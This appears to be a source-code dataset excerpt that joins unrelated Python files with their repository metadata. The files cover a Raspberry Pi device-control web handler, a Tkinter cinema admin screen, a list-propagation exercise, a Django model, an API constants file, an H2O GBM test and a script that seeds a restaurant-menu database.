                return 'Right Lamp ON, with pwm value:',pwmLR,'Lux Range:',savedLux[0],'to',savedLux[256]
            else:
                return "Right Lamp OFF"
        if command == "lampleft":
            import LuxPWMll
            savedLux=LuxPWMll.saveLux
            pwmLL = LuxPWMll.selectLux(deValue)# deValue is required Lux
            drivePWM.select(4,pwmLL)
            if pwmLL !=0:
                return 'Left lamp ON, with pwm value:',pwmLL,'Lux Range:',savedLux[0],'to',savedLux[256]
            else:
                return "Left lamp OFF"
        if command == "streetlamp":
            drivePWM.select(5,deValue)# here deValue is direct pulse (0..4096)
            if deValue !=0:
                return "Street Lamp ON,with PWM value %d" %deValue
            else:
                return "Street Lamp OFF"
        ##------------------------
        ##Cable Car
        ##-----------------------
        # Hall sensor is used to detect the presence of the object
        # add_event_detect function works on the multiple threading protocal
        # MaxCounter is the required counter value inputed by user in web
        # to give the value of 'MaxCounter' user must select ?turn=111
        if command == "cablecar":
            drivePWM.select(6,deValue)# here deValue is direct pulse (0..4096)
            def my_callback(channel):
                global counter
                global MaxCounter
                counter =counter+1
                #print "count %d" %counter
                if deValue != 0 and MaxCounter > 0:
                    MaxCounter=MaxCounter-1
                    drivePWM.select(6,deValue)
                    return "\n Cable Car running, with PWM speed %d" %deValue
                else:
                    drivePWM.select(6,0)
                    return "\n Cable Car STOP"
            # NOTE(review): RPi.GPIO ignores the callback's return value; the
            # callback matters only for its drivePWM/counter side effects.
            GPIO.add_event_detect(HALL_SENSOR, GPIO.FALLING, callback = my_callback, bouncetime=300)
            return "\n Cable Car running, with PWM speed %d" %deValue
        # Input to the maximum counter
        if command == "setcounter":
            global MaxCounter
            MaxCounter= deValue-1
            GPIO.remove_event_detect (HALL_SENSOR)
            drivePWM.select(6,0)
            return "Maximum counter inputed: %d" %deValue
        else:
            return "No such device exist!! Type help."
class root1:
    """web.py catch-all handler: sub-commands for counters, RPM measurement,
    the lux sensor and emergency device shutdown (e.g. GET /getrpm)."""
    def GET(self, command1):
        command1=str (command1)
        # help section
        if command1 == "/help":
            import Help
            return Help.script()
        # read counter value
        if command1 == "/getcountervalue":
            global counter
            return "counter value is %d" %counter
        # new approach for RPM measurement from rotary encoder
        # this is based on the event detection (multiple threading process)
        # when this section is selected, the rpm count is being processed in the background
        # variable rpm is updated in each 5 second
        # updated variable 'rpm' is return to show the current RPM to the user via web
        # NOTE(review): this branch never returns -- the `while True` loop
        # below blocks this request's thread forever; confirm intended.
        if command1 == "/startrpmcounter":
            t0=time.time()
            rpmCount=-1
            def get_encoder_turn(channel):
                global rpmCount
                rpmCount=rpmCount+1
                #print "rpm count %d"%rpmCount
                return rpmCount
            GPIO.add_event_detect(ROTARY_ENCODER, GPIO.BOTH, callback = get_encoder_turn)
            x=0
            while True:
                t1=time.time()
                if t1-t0>=5:#each 5 sec
                    global rpm
                    global rpmCount
                    x=get_encoder_turn(ROTARY_ENCODER)# each 5 second it calls get_encoder_turn function
                    y=x
                    x=0
                    rpmCount=-1
                    rpm=(y/48) #(y/48)*(60/5) --1 revolution is equal to 48 increment.
                    #(24 pulse per 360 degree)
                    #print "The motor RPM is:",rpm
                    t0=t1
        if command1 == "/getrpm":
            global rpm
            return "rpm: %f " %rpm
        if command1 == "/getspeed":
            global rpm
            speed = 2*3.14159*3*(float(rpm)/60)# 2*PI*radius in cm*rps (speed in cm/second)
            return "speed: %f" %speed
        if command1 == "/resetrpm":
            global rpm
            rpm=0
            #GPIO.remove_event_detect (21)
            GPIO.remove_event_detect (ROTARY_ENCODER)
            return "RPM counter reseted"
        # reset counter
        if command1 == "/resetcounter":
            # 23 is the raw pin number of HALL_SENSOR (defined at module top).
            GPIO.remove_event_detect (23)
            global counter
            counter=0
            return "counter reseted"
        #RPM need not to be reseted
        if command1 == "/getlux":
            import LuxSensor39
            LuxSensor39.enable()
            # NOTE(review): the disable() call below is unreachable (it
            # follows a return); the sensor is left enabled.
            return LuxSensor39.getLight()
            LuxSensor39.disable()
        if command1 == "/stopcar":
            GPIO.remove_event_detect (HALL_SENSOR)
            drivePWM.select(6,0)
            return "Cable car stoped"
        if command1 == "/alldeviceoff":
            drivePWM.select(0,0)
            drivePWM.select(1,0)
            drivePWM.select(2,0)
            drivePWM.select(3,0)
            drivePWM.select(4,0)
            drivePWM.select(5,0)
            drivePWM.select(6,0)
            return "All Devices are set to zero"
        else:
            return "Wrong Selection.Type help!!"
if __name__ == '__main__':
Script.run()
| [
"sundar shrestha"
] | sundar shrestha |
719747e9fd97b7338adfa4bb012c7e8acd5be9d4 | 6213d20df981338bd0a0638190b93aeaa2356088 | /adminscherm.py | faa346a5b30de1615c8b642058893e48d8b6d568 | [] | no_license | Pengelz/thuisbioscoop | 3130ee9bd6cd6235f81ee5355fe7f6d4089addc9 | 73682d1a84cab0b3dc7df63ffd4bbafffe5d3567 | refs/heads/master | 2021-01-10T16:06:46.205024 | 2015-10-30T11:32:51 | 2015-10-30T11:32:51 | 44,962,794 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | from tkinter import *
from csv import DictReader
import datetime
def adminscherm(id):
    # Admin screen (Tkinter): for the provider with the given user id, show
    # every film screening they offer and the sorted list of attendees.
    # Dutch field names: 'aanbieder' = provider, 'gekocht' = purchased,
    # 'titel' = title, 'starttijd' = start time, 'bezoekers' = visitors.
    # NOTE(review): parameter `id` shadows the builtin; rename when touched.
    window = Tk()
    window.geometry('500x200')
    def getUsername(id):
        # Look up the username for a user id in the users CSV.
        username = ""
        with open('database/users.csv') as csvfile:
            reader = DictReader(csvfile)
            for row in reader:
                if row['id'] == id:
                    username = row['username']
        return username
    def getInfo(username):
        # Collect all purchases whose provider is this user, annotating each
        # row with the buyer's username.
        info = []
        with open('database/gekocht.csv') as csvfile:
            reader = DictReader(csvfile)
            for row in reader:
                if row['aanbieder'] == username:
                    row['username'] = getUsername(row['id'])
                    info.append(row)
        return info
    def showInfo(sorted_info):
        # Render one row per unique (title, start time) screening, then the
        # alphabetically sorted attendee names next to it.
        y = 10
        sorted_titels = []
        sorted_time = []
        for aankoop in sorted_info:
            if aankoop['titel'] not in sorted_titels and aankoop['starttijd'] not in sorted_time:
                sorted_titels.append(aankoop['titel'])
                sorted_time.append(aankoop['starttijd'])
                titelLabel = Label(master=window, text=aankoop['titel'])
                titelLabel.place(x=10,y=y)
                # 'starttijd' is a Unix timestamp; format as HH:MM dd-mm-yyyy.
                timeLabel = Label(master=window, text=datetime.datetime.fromtimestamp(int(aankoop['starttijd'])).strftime("%H:%M %d-%m-%Y"))
                timeLabel.place(x=100, y=y)
                bezoekers = []
                # `info` is read from the enclosing scope (set below, before
                # showInfo is called).
                for aankoop2 in info:
                    if aankoop2['titel'] == aankoop['titel'] and aankoop2['starttijd'] == aankoop['starttijd']:
                        bezoekers.append(aankoop2['username'])
                sorted_bezoekers = sorted(bezoekers)
                for bezoeker in sorted_bezoekers:
                    bezoekerLabel = Label(master=window, text=bezoeker)
                    bezoekerLabel.place(x=210, y=y)
                    y+=20
    username = getUsername(id)
    info = getInfo(username)
    sorted_info = sorted(info, key= lambda aankoop: aankoop['starttijd'])
    showInfo(sorted_info)
window.mainloop() | [
"mbeunk@live.nl"
] | mbeunk@live.nl |
ed58aea99de7d9a14d3c047e505b21ef18ed34ae | b39ec77a8f5a5779edcecf5a09c39224472fd139 | /Clase06/propagar_6.1.py | 02226f7ba447903ba4f57b208c3d319866601321 | [] | no_license | GonzaloMonteodorisio/ejercicios-python-unsam | 76b6288491ccba8f44b819c26bed4811268e995e | 37ba16197107717a4c582eb552175e1c981c286b | refs/heads/main | 2023-07-28T07:18:10.178029 | 2021-09-15T05:42:46 | 2021-09-15T05:42:46 | 406,627,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | def propagar_al_vecino(l):
modif = False
n = len(l)
for i,e in enumerate(l):
if e==1 and i<n-1 and l[i+1]==0:
l[i+1] = 1
modif = True
if e==1 and i>0 and l[i-1]==0:
l[i-1] = 1
modif = True
return modif
def propagar(l):
    """Propagate 1s through *l* in place until a fixed point is reached.

    Repeatedly applies propagar_al_vecino, counting the passes, prints a
    short Spanish summary, and returns a copy of the ORIGINAL list (taken
    before any propagation happened).
    """
    estado_inicial = l.copy()
    veces = 0
    hubo_cambio = propagar_al_vecino(l)
    while hubo_cambio:
        veces += 1
        hubo_cambio = propagar_al_vecino(l)
    print(f"Repetí {veces} veces la función propagar_al_vecino.")
    print(f"Con input {estado_inicial}")
    print(f"Y obtuve {l}")
    return estado_inicial
def main():
    """Run the propagation demo on three sample configurations."""
    casos = ([0, 0, 0, 0, 1], [0, 0, 1, 0, 0], [1, 0, 0, 0, 0])
    for caso in casos:
        propagar(caso)
main()
# Preguntas:
# 1. ¿Por qué los tests l[i+1]==0 y l[i-1]==0 de la función propagar_al_vecino no causan un IndexError en los bordes de la lista? 2. ¿Por qué propagar([0,0,0,0,1]) y propagar([1,0,0,0,0]), siendo entradas perfectamente simétricas, no generan la misma cantidad de repeticiones de llamadas a la función propagar_al_vecino?
# 3. Sobre la complejidad. Si te sale, calculá: * ¿Cuántas veces como máximo se puede repetir el ciclo while en una lista de largo n? * ¿Cuántas operaciones hace "propagar_al_vecino" en una lista de largo n? * Entonces, ¿cuántas operaciones hace como máximo esta versión de propagar en una lista de largo n? ¿Es un algoritmo de complejidad lineal o cuadrática? | [
"gonzalomonteodorisio@gmail.com"
] | gonzalomonteodorisio@gmail.com |
9c516dad1b8574df54a918eabd85742abeef70de | 2beff20ee54add8be48e137d175101c6323c1455 | /console/models.py | da3b73c8c57a34a5934e66c9a9a013124e8f0dcb | [] | no_license | max7patek/spoticode | 1d7581f1cec5025b13ce7015c24bc898285f3d28 | 9e4e5e1307722f504680b4f1bbfb5dbb658631c9 | refs/heads/master | 2020-04-26T11:13:42.964371 | 2019-03-05T01:48:37 | 2019-03-05T01:48:37 | 173,509,662 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | from django.db import models
import allauth.socialaccount.models as authmodels
#print(dir(authmodels))
class SavedProgram(models.Model):
    """A script saved by a user; saved-program names are unique per user."""
    # Owner; SET_NULL keeps the saved program if the account is deleted.
    user = models.ForeignKey(authmodels.get_user_model(), on_delete=models.SET_NULL, null=True)
    # The program's source text; nullable to allow empty saves.
    script = models.TextField(null=True)
    # User-chosen display name for the program.
    name = models.TextField()
    class Meta:
        # A user cannot have two saved programs with the same name.
        unique_together=('user', 'name')
| [
"max7patek@gmail.com"
] | max7patek@gmail.com |
017c76ac669280e38247d059908c1b41444fef25 | 13592686dbc4e64d98183e2c7a950f28c3e62638 | /clases/ciclowhile.py | a20321562318f9a101f3b0fedf81d3ed46a9c281 | [] | no_license | weincoder/introprogramacion | 33e78ec08ff3f2c2e543e060ab0c759e26726082 | 03daaef00d14b9c2c7c7f0a971679a21a08e3d9e | refs/heads/main | 2023-04-25T00:50:29.087197 | 2021-05-20T12:43:40 | 2021-05-20T12:43:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | #----Mensajes----#
MENSAJE_SALUDAR = 'Bienvenido!! te apoyaré ahorrando'
MENSAJE_AHORRO = 'LLEVAS AHORRADO ...'
PREGUNTAR_VALOR_CPU = 'Cuanto vale el pc que deseas? : '
PREGUNTAR_CUANTO_TIENE = 'Cuanto llevas ahorrado? : '
#---Entradas---#
print(MENSAJE_SALUDAR)
valor = float (input(PREGUNTAR_VALOR_CPU))
ahorrado = float (input(PREGUNTAR_CUANTO_TIENE))
while (valor > ahorrado):
print (MENSAJE_AHORRO, ahorrado, "te faltan ...", valor - ahorrado)
ahorrado = ahorrado + 1000
print (valor == ahorrado) | [
"danielherresan@gmail.com"
] | danielherresan@gmail.com |
37e98bd78155495d5c6dc329da0a8a2a30af3ac3 | 4288836ca203930f5bb53b6b078d201561774857 | /lib/constants.py | 3db4c3da08ec4a8803b9a0b403a3fb2028353bc4 | [
"MIT"
] | permissive | HackMyChurch/aelf-dailyreadings-server | 92e9ab43530077390ceb8f703b8a2f18bf004b5b | 0b65a31219f0e72f39c6f4c8c8016bb5a677dfe6 | refs/heads/master | 2022-03-15T07:48:09.537698 | 2022-03-06T22:48:37 | 2022-03-06T22:48:37 | 60,039,579 | 8 | 4 | null | 2019-07-03T08:42:00 | 2016-05-30T21:21:37 | Python | UTF-8 | Python | false | false | 1,820 | py | # -*- coding: utf-8 -*-
import os
CURRENT_VERSION = 66
# Base URL / Paths
AELF_JSON="https://api.aelf.org/v1/{office}/{year:04d}-{month:02d}-{day:02d}/{region}"
AELF_SITE="http://www.aelf.org/{year:04d}-{month:02d}-{day:02d}/{region}/{office}"
EPITRE_CO_JSON="http://epitre.co/api/1.0/ref/fr-lit/{reference}"
ASSET_BASE_PATH=os.path.join(os.path.abspath(os.path.dirname(__file__)), "../assets")
DEFAULT_REGION="romain"
# HTTP client configuration
HEADERS={'User-Agent': 'AELF - Lectures du jour - API - cathogeek@epitre.co'}
HTTP_TIMEOUT = 10 # seconds
# French constants
DETERMINANTS = [
'd', 'l', 'l\'', 'le', 'la', 'les', 'un', 'une', 'des', 'du', 'de', 'd\'', 'au', 'à',
'ma', 'ta', 'sa', 'mon', 'ton', 'son', 'notre', 'votre', 'leur,'
'mais', 'ou', 'et', 'donc', 'sur', 'sans',
'ce', 'ces', 'cela', 'cette', 'celui', 'celle', 'celles', 'ceux', 'ça',
'pour', 'afin', 'contre', 'avec', 'en',
# Most common common names
'saint', 'sainte', 'anniversaire', 'ordination', 'sermon', 'homelie', 'homélie',
'grand', 'grande',
];
# HTML
HTML_BLOCK_ELEMENTS = [
"body",
"section", "nav",
"header", "footer",
"table", "thread", "tbody", "td", "tr", "th",
"div", "p", "blockquote",
]
# Simple translation tables
OFFICE_NAME = {
"messes": "messe",
}
ID_TO_TITLE = {
'benediction': 'Bénédiction',
}
# Region specific settings
REGION_NOTRE_PERE_NEW = ['belgique', 'afrique']
# Internal Monitoring
# The application syncs up to 30 days in the future. This gives 2 week to fix errors
STATUS_DAYS_TO_MONITOR = int(os.environ.get('AELF_STATUS_DAYS_TO_MONITOR', 45))
# 404 error become fatal 2 weeks ahead
STATUS_DAYS_404_FATAL = 15
STATUS_PROBE_INTERVAL = 3600 * 24
STATUS_PROBE_INTERVAL_ERROR = 60 * 15
| [
"jt@yadutaf.fr"
] | jt@yadutaf.fr |
1f1be68bb97314811a10391916586bfb52b4587e | 0bde5f7f09aa537ed1f4828d4e5ebee66475918f | /h2o-py/tests/testdir_algos/gbm/pyunit_generate_synthetic_GBM_data.py | 69e8d4b6e6eb13aa8f86737692e0663c459a57fe | [
"Apache-2.0"
] | permissive | Winfredemalx54/h2o-3 | d69f1c07e1f5d2540cb0ce5e6073415fa0780d32 | dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7 | refs/heads/master | 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 | Apache-2.0 | 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null | UTF-8 | Python | false | false | 3,436 | py | import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator
import numpy as np
# This test will generate synthetic GBM dataset using a randomly defined GBM trees. If given to
# a GBM model, it should be able to perform well with this dataset since the assumptions associated with
# GBM are used to generate the dataset.
def test_define_dataset():
    """Generate a synthetic bernoulli GBM dataset and check its dimensions.

    NOTE(review): requires a running H2O cluster via the `h2o` package;
    not executable in isolation.
    """
    family = 'bernoulli' # can be any valid GLM families
    nrow = 100000
    ncol = 10
    missing_fraction = 0
    factorRange= 50
    numericRange = 10
    targetFactor = 2
    realFrac = 0.3
    intFrac = 0.3
    enumFrac = 0.4
    ntrees=10
    max_depth=8
    glmDataSet = generate_dataset(family, nrow, ncol, ntrees, max_depth, realFrac, intFrac, enumFrac,
                                  missing_fraction, factorRange, numericRange, targetFactor)
    #h2o.download_csv(glmDataSet, "/Users/.../dataset.csv") # save dataset
    # Expect all rows kept and ncol predictors plus the 'response' column.
    assert glmDataSet.nrow == nrow, "Dataset number of row: {0}, expected number of row: {1}".format(glmDataSet.nrow,
                                                                                                    nrow)
    assert glmDataSet.ncol == (1+ncol), "Dataset number of row: {0}, expected number of row: " \
                                        "{1}".format(glmDataSet.ncol, (1+ncol))
def generate_dataset(family, nrow, ncol, ntrees, max_depth, realFrac, intFrac, enumFrac, missingFrac,
                     factorRange, numericRange, targetFactor):
    """Build a frame whose response is produced by a GBM fitted on random data.

    Creates a random H2O frame, trains a GBM on it, then replaces the random
    response with the model's predictions — so a GBM retrained on the result
    should fit it well (the GBM assumptions hold by construction).
    """
    # Response cardinality: 2 classes for bernoulli, numeric for gaussian,
    # otherwise the caller-supplied factor count.
    if family=="bernoulli":
        responseFactor = 2
    elif family == 'gaussian':
        responseFactor = 1;
    else :
        responseFactor = targetFactor
    trainData = random_dataset(nrow, ncol, realFrac=realFrac, intFrac=intFrac, enumFrac=enumFrac, factorR=factorRange,
                               integerR=numericRange, responseFactor=responseFactor, misFrac=missingFrac)
    myX = trainData.names
    myY = 'response'
    myX.remove(myY)
    m = H2OGradientBoostingEstimator(distribution=family,
                                     ntrees=ntrees,
                                     max_depth=max_depth)
    m.train(training_frame=trainData,x=myX,y= myY)
    f2 = m.predict(trainData)
    # Keep only the predictors and append the prediction as 'response'.
    finalDataset = trainData[myX]
    finalDataset = finalDataset.cbind(f2[0])
    finalDataset.set_name(col=finalDataset.ncols-1, name='response')
    # Free the intermediate frame on the cluster.
    h2o.remove(trainData)
    return finalDataset
def random_dataset(nrow, ncol, realFrac = 0.4, intFrac = 0.3, enumFrac = 0.3, factorR = 10, integerR=100,
                   responseFactor = 1, misFrac=0.01, randSeed=None):
    """Create a random H2O frame (real/int/enum columns plus a response).

    The real/int/enum fractions should sum to 1; time, string and binary
    columns are disabled. Returns the new H2OFrame.
    """
    fractions = dict()
    fractions["real_fraction"] = realFrac # Right now we are dropping string columns, so no point in having them.
    fractions["categorical_fraction"] = enumFrac
    fractions["integer_fraction"] = intFrac
    fractions["time_fraction"] = 0
    fractions["string_fraction"] = 0 # Right now we are dropping string columns, so no point in having them.
    fractions["binary_fraction"] = 0
    df = h2o.create_frame(rows=nrow, cols=ncol, missing_fraction=misFrac, has_response=True,
                          response_factors = responseFactor, integer_range=integerR,
                          seed=randSeed, **fractions)
    return df
if __name__ == "__main__":
pyunit_utils.standalone_test(test_define_dataset)
else:
test_define_dataset()
| [
"noreply@github.com"
] | Winfredemalx54.noreply@github.com |
52c7d93fc07ed9726c863d7145077f3d1e1d0e95 | e952ddf766fe5374105f242937439b925cdbb82b | /proj3py/map.py | e71416f7c8101b268c1fbf53202b695ca1bfc2c3 | [] | no_license | Raenbows/Python-p3 | 8a7155be1b594fab5714c175cfbc5ad33c710096 | 1e0cb070649a6d6040357b33ffe6bd68c3f175b2 | refs/heads/master | 2016-09-06T19:18:53.875706 | 2015-03-08T04:58:41 | 2015-03-08T04:58:41 | 31,820,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | #map.py
#Rachael Byrkit rmb11d
from random import randint
#0 : empty
#1 : player
#2 : enemy (pyro)
#3 : trap (backstab)
#4 : backpack (intel)
class Map:
    """5x5 game grid.

    Cell codes (see original header comment):
    0 empty, 1 player, 2 enemy (pyro), 3 trap (backstab), 4 backpack (intel).
    """

    def __init__(self):
        # Start with an all-empty 5x5 grid.
        self.map = [[0 for _ in range(5)] for _ in range(5)]

    def _place_random(self, value):
        """Put *value* on a uniformly chosen EMPTY cell, retrying on collisions."""
        while True:
            randx = randint(0, 4)
            randy = randint(0, 4)
            if self.map[randx][randy] == 0:
                self.map[randx][randy] = value
                return

    def setMap(self):
        """Populate the grid: player, one trap, four enemies, one backpack.

        Fixes over the original version:
        - the trap could land on (and erase) the player's cell;
        - the enemy loop used `break` on the first collision, so fewer than
          four enemies could be placed, and compared with `is not 0`
          (identity, not equality);
        - every placement now retries until an empty cell is found, matching
          the retry logic the original backpack placement already used.
        """
        # Player always starts at a fixed cell.
        self.map[2][0] = 1
        # set trap
        self._place_random(3)
        # set enemies
        for _ in range(4):
            self._place_random(2)
        # set backpack
        self._place_random(4)
#def nextMove:
| [
"rbyrkit@gmail.com"
] | rbyrkit@gmail.com |
83b141bc76063ab75f1362836c7336ccb0d281c8 | 54ab3131f6198aacc8238021fbaefc20bf559168 | /dbpopfeb3.py | 1775c17ba27a1571a4dd3c0b726379b604d0466f | [] | no_license | mygethub-99/project3submit1 | ffe5330b3ae7cbd0c0c2cc6cdaeb30dbd1869e42 | 4617ce745687ddffa5b85aed94e2b14be41d6bb2 | refs/heads/master | 2021-01-10T06:53:38.806198 | 2016-02-27T13:29:37 | 2016-02-27T13:29:37 | 51,455,093 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 21,578 | py | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from feb32015db import Restaurant, Base, MenuItem, User
engine = create_engine('sqlite:///restaurantmapped.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Create dummy user
User1 = User(name="Owen Workman", email="tomakeitcount@gmail.com",
picture='/static/healthdepart.png')
session.add(User1)
session.commit()
# Menu for UrbanBurger
restaurant1 = Restaurant(user_id=1, name="Urban Burger", address="1321 \
Commerce St, The Adolphus Hotel, Dallas, TX 75202", phone="989-234-6070", \
cuisine_cat="American", health_rating= "Poor", picture \
='/static/urbanburger.png')
session.add(restaurant1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce",
price="$7.50", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem1 = MenuItem(user_id=1, name="French Fries", description="with garlic \
and parmesan",
price="$2.99", course="Appetizer", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chicken Burger", description="Juicy \
grilled chicken patty with tomato mayo and lettuce",
price="$5.50", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Chocolate Cake", description="fresh \
baked and served with ice cream",
price="$3.99", course="Dessert", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Sirloin Burger", description="Made with \
grade A beef",
price="$7.99", course="Entree", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Root Beer", description="16oz of \
refreshing goodness",
price="$1.99", course="Beverage", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Iced Tea", description="with Lemon",
price="$.99", course="Beverage", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Grilled Cheese Sandwich",
description="On texas toast with American Cheese", \
price="$3.49", course="Entree", restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Veggie Burger", description="Made with \
freshest of ingredients and home grown spices",
price="$5.99", course="Entree", restaurant=restaurant1)
session.add(menuItem8)
session.commit()
# Menu for Super Stir Fry
restaurant2 = Restaurant(user_id=1, name="Super Stir Fry", address="5500 \
Greenville Ave, Dallas, TX 75206", phone="989-245-6071", cuisine_cat="Asian",\
health_rating= "Poor", picture= '/static/chinese.jpg')
session.add(restaurant2)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Chicken Stir Fry", description="With \
your choice of noodles vegetables and sauces", price="$7.99", \
course="Entree", restaurant=restaurant2)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Peking Duck",
description=" A famous duck dish from Beijing[1] that has been prepared \
since the imperial era. The meat is prized for its thin, crisp skin, \
with authentic versions of the dish serving mostly the skin and little \
meat, sliced in front of the diners by the cook", price="$25", \
course="Entree", restaurant=restaurant2)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Spicy Tuna Roll", description="Seared \
rare ahi, avocado, edamame, cucumber with wasabi soy sauce ",
price="15", course="Entree", restaurant=restaurant2)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Nepali Momo ", description="Steamed \
dumplings made with vegetables, spices and meat. ",
price="12", course="Entree", restaurant=restaurant2)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Beef Noodle Soup", description="A \
Chinese noodle soup made of stewed or red braised beef, beef broth, \
vegetables and Chinese noodles.", price="14", course="Entree", \
restaurant=restaurant2)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Ramen", description="a Japanese noodle \
soup dish. It consists of Chinese-style wheat noodles served in a meat- or \
(occasionally) fish-based broth, often flavored with soy sauce or miso, and \
uses toppings such as sliced pork, dried seaweed, kamaboko, and green \
onions.", price="12", course="Entree", restaurant=restaurant2)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Jello Fruity", description="Jello with \
local fresh fruit", price="$4.50", course="Dessert", restaurant=restaurant2)
session.add(menuItem7)
session.commit()
menuItem10 = MenuItem(user_id=1, name="Hot Tea", description="Famous Asian \
Tea", price="$4.50", course="Beverage", restaurant=restaurant2)
session.add(menuItem10)
session.commit()
# Menu for Panda Garden
restaurant1 = Restaurant(user_id=1, name="Panda Garden",address="3511 Oak Lawn \
Ave, Dallas, TX 75219", phone="989-865-7530", cuisine_cat="Asian", \
health_rating= "Good", picture= '/static/stirfry.jpg')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Pho", description="a Vietnamese noodle \
soup consisting of broth, linguine-shaped rice noodles called banh pho, a \
few herbs, and meat.", price="$8.99", course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Chinese Dumplings", description="a \
common Chinese dumpling which generally consists of minced meat and finely \
chopped vegetables wrapped into a piece of dough skin. The skin can be \
either thin and elastic or thicker.", price="$6.99", course="Appetizer", \
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Gyoza", description="light seasoning \
of Japanese gyoza with salt and soy sauce, and in a thin gyoza wrapper", \
price="$9.95", course="Entree", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Stinky Tofu", description="Taiwanese \
dish, deep fried fermented tofu served with pickled cabbage.", \
price="$6.99", course="Entree", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$9.50", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Jello Fruity", description="Jello \
with local fresh fruit", price="$4.50", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Hot Tea", description="Famous Asian Tea",\
price="$4.50", course="Beverage", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
# Menu for Thyme for that
restaurant1 = Restaurant(user_id=1, name="Thyme for That Vegetarian Cuisine", \
address="4901 Bryan St, Dallas, TX 75206-7613", phone="128-234-5550", \
cuisine_cat="Vegetarian", health_rating= "Excellent", picture= \
'/static/veg.jpg')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Tres Leches Cake", description="Rich, \
luscious sponge cake soaked in sweet milk and topped with vanilla bean \
whipped cream and strawberries.", price="$2.99", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem1)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Mushroom risotto", description=\
"Portabello mushrooms in a creamy risotto",
price="$5.99", course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Honey Boba Shaved Snow",
description="Milk snow layered with honey boba, jasmine tea jelly, \
grass jelly, caramel, cream, and freshly made mochi", price="$4.50", \
course="Dessert", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Cauliflower Manchurian", description=\
"Golden fried cauliflower florets in a midly spiced soya,garlic sauce cooked \
with fresh cilantro, celery, chilies,ginger & green onions",
price="$6.95", course="Appetizer", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Aloo Gobi Burrito", description="Vegan \
goodness. Burrito filled with rice, garbanzo beans, curry sauce, potatoes \
(aloo), fried cauliflower (gobi) and chutney. Nom Nom", price="$7.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem2 = MenuItem(user_id=1, name="Veggie Burger", description="Juicy \
grilled veggie patty with tomato mayo and lettuce", price="$6.80", \
course="Entree", restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Juice and Smoothy Bar", description=\
"Pick of any Jice of Smoothy drink", price="$5.95", course="Beverage",\
restaurant=restaurant1)
session.add(menuItem8)
session.commit()
# Menu for Tony's Bistro
restaurant1 = Restaurant(user_id=1, name="Tony's Bistro", address="1322 \
Commerce St, The Adolphus Hotel, Dallas, TX 75202", phone="946-430-6070", \
cuisine_cat="Italian", health_rating= "Excellent", picture= \
'/static/tonysbistro.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Shellfish Tower", description=\
